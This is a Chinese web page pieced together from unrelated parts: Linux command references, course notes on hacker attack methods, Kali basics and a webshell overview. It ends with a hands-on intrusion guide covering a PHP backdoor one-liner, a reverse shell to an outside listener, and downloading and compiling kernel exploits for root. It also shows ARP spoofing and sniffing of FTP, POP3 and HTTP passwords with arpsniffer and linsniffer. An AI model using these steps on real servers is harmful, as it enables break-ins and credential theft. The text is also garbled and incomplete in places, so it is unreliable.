黑客linux入侵常用命令汇总

合集下载

Linux命令大全完整版

Linux命令大全完整版

Linux命令大全完整版目录目录 (I)1. linux系统管理命令 (1)adduser (1)chfn(change finger information) (1)chsh(change shell) (1)date (2)exit (3)finger (4)free (5)fwhois (5)gitps(gnu interactive tools process status) (5)groupdel(group delete) (6)groupmod(group modify) (6)halt (7)id (7)kill (8)last (8)lastb (8)login (9)logname (9)logout (9)logrotate (9)newgrp (10)nice (10)procinfo(process information) (11)ps(process status) (11)pstree(process status tree) (14)renice (15)rlogin(remote login) (16)rsh(remote shell) (16)rwho (16)screen (17)shutdown (17)sliplogin (18)su(super user) (18)sudo (19)suspend (19)swatch(simple watcher) (20)tload (20)top (21)uname (21)useradd (22)userconf (22)userdel (23)usermod (23)vlock(virtual console lock) (24)w (24)who (25)whoami (25)whois (25)2. linux系统设置命令 (27)alias (27)apmd(advanced power management BIOS daemon) (27)aumix(audio mixer) (27)bind (29)chkconfig(check config) (29)clock (30)crontab (31)declare (31)depmod(depend module) (32)dircolors (32)dmesg (33)enable (33)eval (33)export (33)fbset(frame buffer setup) (34)grpconv(group convert to shadow password) (35)grpunconv(group unconvert from shadow password) (35)hwclock(hardware clock) (35)insmod(install module) (36)kbdconfig (36)lilo(linux loader) (37)liloconfig (38)lsmod(list modules) (38)minfo (38)mkkickstart (39)modinfo(module infomation) (39)modprobe(module probe) (39)mouseconfig (40)ntsysv (41)passwd(password) (41)pwconv (41)pwunconv (42)rdate(receive date) (42)resize (42)rpm(redhat package manager) (43)set (46)setconsole (47)setenv(set environment variable) (48)setup (48)sndconfig (48)SVGAText Mode (49)timeconfig (49)ulimit (50)unalias (50)unset (51)3. linux文档编辑命令 (52)col (52)colrm(column remove) (52)comm(common) (52)csplit(context split) (53)ed(editor) (53)egrep (54)ex (54)fgrep(fixed regexp) (54)fmt(fromat) (54)fold (55)grep (55)ispell(interactive spelling checking) (57)jed (58)joe (58)join (60)look (61)mtype (61)rgrep(recursive grep) (62)sed(stream editor) (63)sort (64)spell (65)tr(translate character) (65)uniq (65)wc(word count) (66)4. linux压缩备份命令 (67)ar (67)bunzip2 (68)bzip2 (68)bzip2recover (69)compress (69)cpio(copy in/out) (70)dump (72)gunzip(gnu unzip) (73)gzexe(gzip executable) (74)gzip(gnu zip) (74)lha (75)restore (76)tar(tape archive) (77)unarj (80)unzip (81)zip (82)zipinfo (83)5.linux文件管理命令 (85)diff(differential) (85)diffstat(differential status) (86)file (87)git(gnu interactive tools) (90)gitview(gnu interactie tools viewer) (91)ln(link) (91)locate (92)lsattr(list attribute) (92)mattrib (93)mc(midnight commander) (93)mcopy (94)mdel (94)mktemp (95)mmove (95)mread (95)mren (96)mshowfat (96)mtools (96)mtoolstest (96)mv (97)od(octal dump) (97)paste (98)patch (99)rcp(remote copy) (101)rhmask (101)rm(remove) (101)slocate(secure locate) (102)split (102)tee (103)tmpwatch(temporary watch) (103)touch (103)umask (104)which (105)cat (105)chattr(change attribute) (106)chgrp(change group) (106)chmod(change mode) (107)chown(change owner) (108)cksum(check sum) (109)cmp(compare) (109)cp(copy) (110)cut (111)indent (111)6.linux文件传输命令 (115)bye (115)ftp(file transfer protocol) (115)ftpcount (115)ftpshut(ftp shutdown) (115)ftpwho (116)ncftp(nc file transfer protocol) (116)tftp(trivial file transfer protocol) (116)uucico (116)uucp (117)uupick (118)uuto (119)7. linux磁盘管理命令 (120)cd(change directory) (120)df(disk free) (120)dirs (121)du(disk usage) (121)edquota(edit quota) (122)lndir(link directory) (123)ls(list) (123)mcd (125)mdeltree (125)mdu (126)mkdir(make directories) (126)mlabel (126)mmd (127)mmount (127)mrd (127)mzip (127)pwd(print working directory) (128)quota (128)quotacheck (128)quotaoff (129)quotaon (129)repquota(report quota) (130)rmdir(remove directory) (130)rmt(remote magnetic tape) (130)stat(status) (131)Tree (131)umount (132)8. linux磁盘维护命令 (133)badblocks (133)cfdisk (133)dd (134)e2fsck(ext2 file system check) (134)ext2ed(ext2 file system editor) (136)fdisk (137)fsck.ext2(file system check-second filesystem) (137)fsck(file system check) (138)fsck.minix(file system check-minix filesystem) (139)fsconf(file system configurator) (139)hdparm(hard disk parameters) (139)losetup(loop setup) (141)mbadblocks (141)mformat (141)mkbootdisk(make boot disk) (142)mkdosfs(make Dos file system) (143)mke2fs(make ext2 file system) (143)mkfs.ext2 (144)mkfs(make file system) (144)mkfs.minix (145)mkfs.msdos (145)mkinitrd(make initial ramdisk images) (145)mkisofs(make iso file system) (145)mkswap (147)mpartition (148)sfdisk (148)swapoff (149)swapon (149)symlinks(symbolic links) (149)sync (150)9. linux网络通讯命令 (151)dip (151)getty(get teletypewriter) (151)mingetty (152)ppp-off (152)smbd(samba daemon) (152)telnet (153)uulog (154)uustat (154)uux (155)cu(call up) (156)dnsconf(dns configurator) (157)efax (158)httpd(http daemon) (159)ifconfig (159)mesg (160)minicom (161)nc (161)netconf (162)netstat (162)ping (163)pppstats(point to point protocol status) (164)samba (164)setserial (165)shapecfg(shaper configuration) (165)smbd(samba daemon) (166)statserial(status ofserial port) (166)talk (166)Tcpdump (167)testparm(test parameter) (168)traceroute (168)tty(teletypewriter) (169)uuname (169)wall(write all) (170)write (170)ytalk (170)arpwatch(ARP watcher) (170)apachectl(Apache control interface) (171)smbclient(samba client) (171)pppsetup (172)10. linux电子邮件与新闻组命令 (173)archive (173)ctlinnd(control the internet news daemon) (173)elm (173)getlist (174)inncheck(inn check) (174)mail (175)mailconf (175)mailq(mail queue) (175)messages (176)metamail (176)mutt (177)nntpget (178)pine (178)slrn (180)11. linux其他命令 (181)reconfig (181)startx(start X Window) (181)xconfigurator (181)XF86Setup (182)xlsatoms (182)xlsclients (183)xlsfonts (183)yes (184)1. linux系统管理命令adduser功能说明:新增用户帐号。

linux常用100个命令

linux常用100个命令

linux常用100个命令以下是常用的100个Linux命令:1. ls - 列出当前目录中的文件和文件夹2. cd - 改变当前工作目录3. pwd - 显示当前工作目录的路径4. mkdir - 创建一个新的目录5. rmdir - 删除一个空的目录6. touch - 创建一个新的空文件7. cp - 复制文件或目录8. mv - 移动或重命名文件或目录9. rm - 删除文件或目录10. cat - 显示文件内容11. less - 逐行显示文件内容12. head - 显示文件的前几行内容13. tail - 显示文件的后几行内容14. grep - 在文件中搜索匹配的文本15. find - 在文件系统中搜索文件16. chmod - 改变文件或目录的权限17. chown - 改变文件或目录的所有者18. chgrp - 改变文件或目录的所属组19. du - 显示目录或文件的磁盘使用情况20. df - 显示文件系统的磁盘使用情况21. file - 显示文件的类型22. ln - 创建一个硬链接或符号链接23. mount - 挂载文件系统24. umount - 卸载文件系统25. tar - 创建或解压归档文件26. gzip - 压缩文件27. gunzip - 解压缩文件28. wget - 下载文件29. curl - 通过URL获取或发送数据30. ssh - 远程登录到另一台计算机31. scp - 在本地主机和远程主机之间复制文件32. ping - 测试与另一台计算机的连接33. ifconfig - 显示或配置网络接口34. netstat - 显示网络连接、路由表等信息35. iptables - 配置防火墙规则36. ps - 显示当前运行的进程37. top - 显示系统中运行的进程和资源使用情况38. kill - 终止正在运行的进程39. service - 启动、停止或重启系统服务40. systemctl - 管理系统服务41. uname - 显示系统信息42. date - 显示或设置系统时间和日期43. history - 显示或搜索命令历史记录44. which - 显示可执行文件的路径45. echo - 显示文本或变量的值46. export - 设置环境变量47. source - 执行一个脚本文件48. alias - 创建命令别名49. sed - 流编辑器,用于文件内容的替换和修改50. awk - 文本处理工具,用于提取和处理文本数据51. sort - 对文本进行排序52. uniq - 删除重复的行53. diff - 比较两个文件的差异54. tr - 替换、删除或压缩字符55. cut - 从文本中提取字段56. paste - 将多个文件的行合并成一行57. join - 根据共同的字段将两个文件合并58. split - 将文件分割成多个较小的文件59. grep -v - 显示不匹配的文本行60. grep -c - 统计匹配的文本行数61. grep -i - 忽略大小写进行匹配62. grep -r - 递归地搜索目录中的文件63. grep -w - 匹配整个单词而不是部分匹配64. grep -A - 显示匹配行及其后面的几行65. grep -B - 显示匹配行及其前面的几行66. grep -C - 显示匹配行及其前后的几行67. awk '{print $1}' - 打印每行的第一个字段68. awk '{print $NF}' - 打印每行的最后一个字段69. awk '/pattern/{print}' - 打印匹配模式的行70. awk '/pattern/{print $2}' - 打印匹配模式的第二个字段71. awk '{sum+=$1} END {print sum}' - 计算第一列的总和72. awk '{if ($1 > 10) print}' - 打印第一列大于10的行73. awk '{if ($1 > 10) print $2}' - 打印第一列大于10的第二个字段74. awk '{print NR, $0}' - 打印行号和整行内容75. awk '{for (i=1; i<=NF; i++) print $i}' - 打印每个字段76. sed 's/pattern/replace/' - 替换匹配的文本77. sed '/pattern/d' - 删除匹配的文本行78. sed '/pattern/s/old/new/' - 在匹配的文本行中替换文本79. sed '/pattern/!d' - 删除不匹配的文本行80. sed '1d' - 删除第一行81. sed '$d' - 删除最后一行82. sed -n '1,5p' - 打印前5行83. sed -n '5,$p' - 打印从第5行到最后一行84. sed -n '/pattern/p' - 打印匹配的文本行85. sed -n '/pattern/{p;q;}' - 打印匹配的文本行并退出86. sort -n - 对数字进行排序87. sort -r - 逆序排序88. sort -u - 去除重复的行89. sort -k2 - 按第二个字段进行排序90. sort -t',' -k2 - 使用逗号作为分隔符,按第二个字段进行排序91. uniq -c - 统计重复的行数92. uniq -d - 只显示重复的行93. uniq -u - 只显示不重复的行94. diff -u - 显示详细的差异95. diff -r - 递归比较目录中的文件96. tr 'a-z' 'A-Z' - 将小写字母转换为大写字母97. tr -d '[:digit:]' - 删除所有数字98. tr -s ' ' - 合并连续的空格为一个空格99. cut -d',' -f1 - 使用逗号作为分隔符,打印第一个字段100. cut -c1-5 - 打印每行的前五个字符这些命令是Linux中最常用的命令之一,可以帮助您在终端中进行文件和文本处理、系统管理、网络配置等操作。

第2章黑客常用的系统攻击方法

第2章黑客常用的系统攻击方法
计算机网络安全基础
任课教师:余文琼 2006年2月15日
第2 章
黑客常用的系统攻击方法
主要内容
2.1 黑客概述:由来、动机、攻击过程、攻击技术
及发展趋势
2.2 2.3 2.4 2.5 2.6
网络扫描原理与常用工具使用 网络监听原理与常用工具使用 木马攻击原理、常用工具与预防 拒绝服务攻击原理与预防 缓冲区溢出攻击原理与预防
2.2
网络安全扫描技术
一、安全扫描技术的基本原理: 安全扫描技术的基本原理: 安全扫描也称为脆弱性评估,其基本原理是采用 安全扫描也称为脆弱性评估 模拟黑客攻击的形式对目标可能存在的已知的安全 漏洞进行逐项检查,然后根据扫描结果向系统管理 员提供周密的、可靠的安全性分析报告,为提高网 络安全整体水平提供重要依据。 显然,安全扫描软件是把双刃剑,黑客可以利用它 来入侵系统,而系统管理员掌握它又可以有效地防 范黑客入侵。因此,安全扫描是保证系统和网络安 全必不可少的手段,要求仔细研究利用。
早期的黑客是指那些乐于深入探究系统的奥秘、寻找系统的 早期的黑客 漏洞、为别人解决困难,并不断挣脱网络和计算机给人们带 来的限制的计算机技术行家。早期的许多黑客,现在已成为 IT界的著名企业家或者安全专家。 到了20世纪80年代 80年代 80年代以后,随着计算机网络技术的发展,黑客 们把精力放在了各种系统漏洞上,并通过暴露网络系统中的 缺陷与非授权更改服务器等行为,来达到表现自我和反对权 威的目的。 21世纪 世纪以后,黑客群体又有了新的变化和新的特征:黑客群 21世纪 体扩大化、组织化、集团化、商业化、政治化。
三、网络安全扫描技术分类
目前安全扫描技术主要分两类:基于主机和基 于网络的安全扫描。 基于主机的扫描技术:它采用被动的、非破坏性的 基于主机的扫描技术

Linux终端常用命令

Linux终端常用命令
12. chown 命令 语法:chown [选项] <文件名称或目录名称> 功能:更改某个文件或目录的属主和属组,将指定文件的拥有者改为指定的用户或组。 13. file命令 语法:file [选项] <文件名称> 功能:识别文件类型。
14. diff命令 语法:diff [选项] <文件名称...> 功能:比较文件之间的差异。以逐行的方式,比较文本文件的异同处。 15. grep命令 语法:grep [选项] [文件名称…] 功能:以指定模式搜索文件,指定文件中搜索到与指定的模式匹配的字符串,并打印
6. mount命令 语法:mount [选项] <文件系统> <目录> 功能:挂载文件系统。除了直接指定文件系统外,也可以用设备名称或挂入点来表示
文件系统。
7. umount命令 语法:umount [选项] <目录> 功能:卸除文件系统。除了直接指定文件系统外,也可以用设备名称或挂入点来表示
文件系统。 8. quotacheck命令 语法:quotacheck [选项][文件系统...] 功能:检查磁盘的使用空间与限制。该命令扫描挂入系统的分区,并在各分区的文件
3.4 用户管理命令
1. useradd命令 语法:useradd [选项][用户帐号] 功能:建立用户帐号。帐号建好之后,再用passwd设定帐号的密码,使用useradd指
令所建立的帐号,实际上是保存在/etc/passwd文本文件中。 2. userdel命令 语法:userdel [选项][用户帐号] 功能:删除用户帐号。该命令可删除用户帐号与相关的文件。如果不加参数,则仅删
13. badblocks命令 语法:badblocks [选项][磁盘装置][磁盘区块数][启始区块] 功能:检查磁盘装置中损坏的区块。 14. dd命令 语法:dd [选项] [文件名或目录] 功能:读取,转换并输出数据。 15. fsck命令 语法:fsck [选项][文件系统...] 功能:检查文件系统并尝试修复错误。

常见的攻击Linux系统的手法

常见的攻击Linux系统的手法

常见的攻击Linux系统的手法1、直接窃听取得root密码,或者取得某位特殊User的密码,而该位User可能为root,再获取任意一位User的密码,因为取得一般用户密码通常很容易。

2、黑客们经常用一些常用字来破解密码。

曾经有一位美国黑客表示,只要用“password”这个字,就可以打开全美多数的计算机。

其它常用的单词还有:account、ald、alpha、beta、computer、dead、demo、dollar、games、bod、hello、help、intro、kill、love、no、ok、okay、please、sex、secret、superuser、system、test、work、yes等。

3、使用命令就可以知道该台计算机上面的用户名称。

然后找这些用户下手,并通过这些容易入侵的用户取得系统的密码文件/etc/passwd,再用密码字典文件搭配密码猜测工具猜出root的密码。

4、利用一般用户在/tmp目录放置着的SetUID的文件或者执行着SetUID程序,让root去执行,以产生安全漏洞。

5、利用系统上需要SetUID root权限的程序的安全漏洞,取得root的权限,例如:pppd。

6、从.rhost的主机入侵。

因为当用户执行rlogin登录时,rlogin程序会锁定.rhost定义的主机及账号,并且不需要密码登录。

7、修改用户的.login、cshrc、.profile等Shell设置文件,加入一些破坏程序。

用户只要登录就会执行。

8、只要用户登录系统,就会不知不觉地执行Backdoor程序(可能是Crack程序),它会破坏系统或者提供更进一步的系统信息,以利Hacker渗透系统。

9、如果公司的重要主机可能有网络防火墙的层层防护,Hacker有时先找该子网的任何一台容易入侵的主机下手,再慢慢向重要主机伸出魔掌。

例如:使用NIS共同联机,可以利用remote 命令不需要密码即可登录等,这样黑客就很容易得手了。

实用linux命令大全(详细)

实用linux命令大全(详细)

linux命令(重新整理)Linux基本操作命令首先介绍一个名词“控制台(console)”,它就是我们通常见到的使用字符操作界面的人机接口,例如dos。

我们说控制台命令,就是指通过字符界面输入的可以操作系统的命令,例如dos命令就是控制台命令。

我们现在要了解的是基于Linux操作系统的基本控制台命令。

有一点一定要注意,和dos命令不同的是,Linux的命令(也包括文件名等等)对大小写是敏感的,也就是说,如果你输入的命令大小写不对的话,系统是不会做出你期望的响应的。

模式切换1、由字符到图型#startx或#init 52、由图形到字符#logout或init 33、注销#logout或exit或ctrl+d4、关机#poweroff或init 0或shutdown now或halt -p5、重启#reboot或init 6或shutdown -r now获得帮助#help提供内部命令的帮助#man或info提供外部命令的帮助。

如果你的英文足够好,那完全可以不靠任何人就精通linux,只要你会用man。

Man实际上就是察看指令用法的help,学习任何一种UNIX类的操作系统最重要的就是学会使用man这个辅助命令。

man是manual(手册)的缩写字,它的说明非常的详细,但是因为它都是英文,看起来非常的头痛。

建议大家需要的时候再去看man,平常吗,记得一些基本用法就可以了。

ls这个命令就相当于dos下的dir命令一样,这也是Linux控制台命令中最为重要几个命令之一。

ls最常用的参数有三个:-a -l -F。

ls -aLinux上的文件以“.”开头的文件被系统视为隐藏文件,仅用ls命令是看不到他们的,而用ls -a除了显示一般文件名外,连隐藏文件也会显示出来。

ls -l(这个参数是字母L的小写,不是数字1)这个命令可以使用长格式显示文件内容,如果需要察看更详细的文件资料,就要用到ls -l这个指令。

渗透利器(第一章-2)kalilinux基础命令讲解介绍

渗透利器(第一章-2)kalilinux基础命令讲解介绍

渗透利器(第⼀章-2)kalilinux基础命令讲解介绍认识Linux什么是shellshell与终端的区别Linux常⽤命令Linux中⽂件与⽬录的权限什么是shell在计算机科学中,shell俗称外壳(⽤来区别于内核),它类似于windows的dos,能够接收⽤户的命令并翻译给操作系统执⾏,是⽤户与操作系统(内核)之间的桥梁查看shell查看系统⽀持那些shellcat/etc/shells查看正在使⽤的shellecho $SHELLshell与终端的区别终端:接受⽤户的输⼊,并传递给shell程序,接受程序输出并展⽰到屏幕shell:接受并解析⽤户的命令给操作系统执⾏,将结果输出到终端使⽤vim编辑器VM编辑器是所有Unix及Linux系统下标准的编辑器,他就相当于windows系统中的记事本⼀样,它的强⼤不逊⾊于任何最新的⽂本编辑器。

他是我们使⽤Linux系统不能缺少的⼯具。

vim具有程序编辑的能⼒,可以以字体颜⾊辨别语法的正确性,⽅便程序设计;vim可以当作vi的升级版本,他可以⽤多种颜⾊的⽅式来显⽰⼀些特殊的信息。

vim会依据⽂件扩展名或者是⽂件内的开头信息,判断该⽂件的内容⽽⾃动的执⾏该程序的语法判断式,再以颜⾊来显⽰程序代码与⼀般信息。

vim⾥⾯加⼊了很多额外的功能,例如⽀持正则表达式的搜索、多⽂件编辑、块复制等等。

这对于我们在Linux上进⾏⼀些配置⽂件的修改⼯作时是很棒的功能。

vi/vim编辑器模式命令模式(默认):刚进⼊vim的时候,默认就是命令模式,可以复制⾏,删除⾏等。

输⼊模式- +命令模式 ESC键输⼊模式:可以输⼊内容。

关闭、保存⽂件模式转换 shift键+:号使⽤insert键切换进⼊输⼊模式命令模式下:命令模式-→输⼊模式:W:保存.i:在当前光标所在字符的前⾯,转为输⼊模式 q:退出I:在当前光标所在⾏的⾏⾸转换为输⼊模式 wq和x都是保存退出a:在当前光标所在字符的后⾯,转为输⼊模式 q! :强制退出A:在光标所在⾏的⾏尾,转换为输⼊模式 w! :强制保存,管理员才有权限o:在当前光标所在⾏的下⽅,新建⼀⾏,并转为输⼊模式0:在当前光标所在⾏的上⽅,新建-⾏,并转为输⼊模式查找s:删除光标所在字符普通模式:r:替换光标处字符 /PATTERN:从当前位置向后查找PATTERN: 从当前位置向前查找date命令date命令⽤于显⽰及设置系统的时间或⽇期,格式为“date [选项] [+指定的格式]”。

webshell在kali中的用法和防范措施

webshell在kali中的用法和防范措施

webshell在kali中的用法和防范措施Webshell是一种黑客常用的工具,它可以通过在目标系统上上传并执行一段恶意代码,从而获得对目标系统的控制权。

在网络安全领域中,特别是在红队和渗透测试中,了解webshell的用法以及如何防范它是非常重要的。

首先,让我们了解一下webshell在Kali中的用法。

Kali Linux是一种广泛应用于渗透测试和网络安全研究的操作系统。

由于Kali Linux是专为渗透测试和安全评估而设计的,它提供了丰富的工具和资源来测试和攻击目标系统。

1. 上传webshell:在Kali Linux中,可以使用各种方式来上传webshell到目标系统。

常用的技术包括利用文件上传漏洞、钓鱼攻击和社交工程等。

通过这些方法,黑客可以将webshell文件上传到目标系统的可访问目录中,并通过Web服务器执行该文件。

2. 运行命令并执行操作:一旦成功上传webshell文件,黑客可以利用它来执行各种操作,例如列出目录、上传和下载文件、执行命令、创建用户和访问系统数据等。

webshell通常具有一个命令行界面,黑客可以使用它来与目标系统进行交互。

3. 接管系统控制权:通过webshell,黑客可以远程接管目标系统,并获得对操作系统的完全控制。

这使得黑客可以操纵目标系统,执行各种恶意操作,如数据窃取、破坏系统文件、安装后门等。

鉴于webshell的危害性,我们必须采取适当的防范措施来保护目标系统。

以下是一些防范webshell的常见措施:1. 定期更新和修补系统:保持目标系统的操作系统和应用程序更新可以减少webshell利用已知漏洞的风险。

及时修补已知漏洞是防止黑客利用这些漏洞上传webshell的有效方法。

2. 强化访问控制:合理配置系统的访问控制措施是防范webshell的关键。

限制web服务器上可执行的文件和目录的访问权限,仅允许合法用户执行必要的操作。

此外,还应对文件上传功能进行严格的用户验证和检查,以防止恶意文件上传。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

黑客linux入侵常用命令汇总
写个php一句话后门上去:
[jobcruit@wa64-054 rankup_log]$ echo -e "" >rankuplog_time.php [jobcruit@wa64-054 rankup_log]$ cat rankuplog_time.php
1.linux的想着先跨站。

shell浏览目标站不行,命令行下输入ls -la /users/
2.溢出提权
# python –c ‘impotr pty;pty.spawn(“/bin/sh”);
来得到交互的Shell,一般的系统都默认安装python
输入id
bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$
这里uid=529(zeicom)还不是root权限,
输入uname –r
返回:2.6.18-164.11.1.el5PAE
Linux提权大致可分为,第三方软件漏洞、本地信任特性、内核溢出
找对应的exp, 这里地址整理很齐全可以这里下
http://tools.90sec/
http://sebug/paper/linux_exp/
/bitch/exp/
http://exploit-db/search/
命令输入pwd,这个命令是显示当前目录,
先看能不能编译 gcc -help
当前目录就是shell的目录,我在shell上传2.c
反弹shell 到外网自己机器的12345端口
上外网服务器本地监听nc -lvvp 12345
一般都能得到一个apache交互的shell 有时候又不行
这时候
# python -c impotr pty;pty.spawn("/bin/sh");
cd /tmp 进入tmp目录
mkdir Papers 创建一个Papers的目录Papers不显眼
cd Papers 进入Papers目录
pwd 查看当前目录
然后命令输入
wget 下载exp
gcc –o 2 2.c //把2.c编译成可执行文件g++ -o keio
chmod +x 2 //给2有执行权限
./2 //执行2, 溢出
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
确定arpsniffer.c需要先装pcap和libnet。

rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
wget http://downloads.sourceforge/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000">tar zxvf libpcap-0.8.1.tar.gz
cd libpcap-0.8.1
./configure
make
make install
重新编译arpsniffer.c
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
这次没报错,编译成功。

./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254
下面开始欺骗,由于是服务器端,因此我们欺骗网关:(网络环境如下,邮件服务器ip:192.168.0.11 网关:192.168.0.1 本机:192.168.0.77)
./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110
在另一个登录里面用tcpdump监听下
tcpdump -i eth0 host 192.168.0.11
发现有数据,把监听的数据存在文件里面:
tcpdump -i eth0 host 172.16.0.12 -w pop.txt
10分钟后停止,在SecureCRT下用sz命令下载pop.txt到本地,然后用Ethereal分析。

下面我们就可以用linsniffer监听我们想要的用户名和密码了。

先修改linsniffer.c:根据自己的需求监听相应的应用密码。

我的如下:
if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/
if(ntohs(tcp->dest)==23) p=1; /* telnet */
if(ntohs(tcp->dest)==80) p=1; /* http */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
[root@bbs111 root]# gcc -o linsniffer linsniffer.c
In file included from /usr/include/linux/tcp.h:21,
from linsniffer.c:32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include instead!
不用管警告,直接运行编译后的linsniffer即可。

[root@bbs111 root]# ./linsniffer
用户名和密码都自动存到了tcp.log下。

3.利用跨站代码
linux不提权跨目录访问的代码
linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。

在提不了权的情况下,试试如下代码吧。

运气好的话说不定就跨过去了。

代码如下:
$path = stripslashes($_GET[path]);。

相关文档
最新文档